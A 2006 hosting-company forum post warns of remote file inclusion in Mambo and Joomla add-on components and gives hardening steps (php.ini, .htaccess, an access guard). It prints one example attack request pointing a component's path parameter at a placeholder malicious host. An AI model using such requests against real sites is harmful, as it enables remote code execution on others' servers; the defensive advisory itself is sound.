Web Hosting Forum | Lunarpages


*
Welcome, Guest. Please login or register.
Did you miss your activation email?



Login with username, password and session length
September 16, 2014, 07:34:26 PM

Pages: [1]   Go Down
  Print  
Author Topic: Mambo and Joomla Vulnerabilities  (Read 10006 times)
Danielle
Guest
« on: July 18, 2006, 05:57:09 AM »

Hi,

Currently, there is a high vulnerability risk for addon components to Mambo and Joomla due to our servers having register_globals set to ON in the global php.ini  This is being exploited to run the following type of url string to upload malicious files onto an account:

Code:
GET
/components/com_somecomponent/componentfile.php?mosConfig_absolute_path=
http://somesite.com/somemaliciousfile.txt

Where somecomponent is the component such as com_smf or com_extcalendar and componentfile.php is the file like smf.php or extcalendar.php (these are just examples, many Mambo and Joomla addon components have this security hole), and where somesite.com is any site where the hacker has his crummy file and somemaliciousfile.txt is that file.

The manner to fix this issue is the following:

1. Create a php.ini on the account at /home/user/public_html (user here indicated your cPanel username).  You can reach this location if you log into cPanel, click on File Manager, then click on the folder icon next to public_html folder.  Inside public_html, simply click "Create File" link, then in the upper right, name the file php.ini.  Check the file doesn't already exist in public_html.  If it does exist, simply add the 2 lines in Step #2 to that file.

2. In the php.ini file put:

Code:
register_globals = Off
allow_url_fopen = Off

3. In public_html folder, open .htaccess file by clicking on the file's name in File Manager and selecting "Edit File" in the upper right hand corner list of links, then add this (change user to your cPanel username in the /home/user/public_html path):
 
Code:
suPHP_ConfigPath /home/user/public_html
<Files php.ini>
order allow,deny
deny from all
</Files>

4. In the exploited or exploitable file in question (/home/user/public_html/mambolocation/components/com_somecomponent/componentfile.php), add this:

Code:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');

Put that at the top right after the opening php tag (<?php or <?).

These should ensure the component is not exploitable. 

I hope this helps.

Edit: There are 2 very helpful threads on Joomla's forum about security for Joomla (Mambo would be able to benefit from the same discussion as these will also help to protect it more):

http://forum.joomla.org/index.php/topic,75376.0.html
http://forum.joomla.org/index.php/topic,76578.0.html
« Last Edit: July 20, 2006, 11:24:28 PM by Danielle » Logged
JamesG
Web Designer UK
Berserker Poster
*****
Offline Offline

Posts: 11734


Web Designer


WWW
« Reply #1 on: September 21, 2006, 02:00:13 AM »

thanks Smile, worked perfect and got rid of the annoying error in my admin area Smile
Logged

Pages: [1]   Go Up
  Print  
 
Jump to: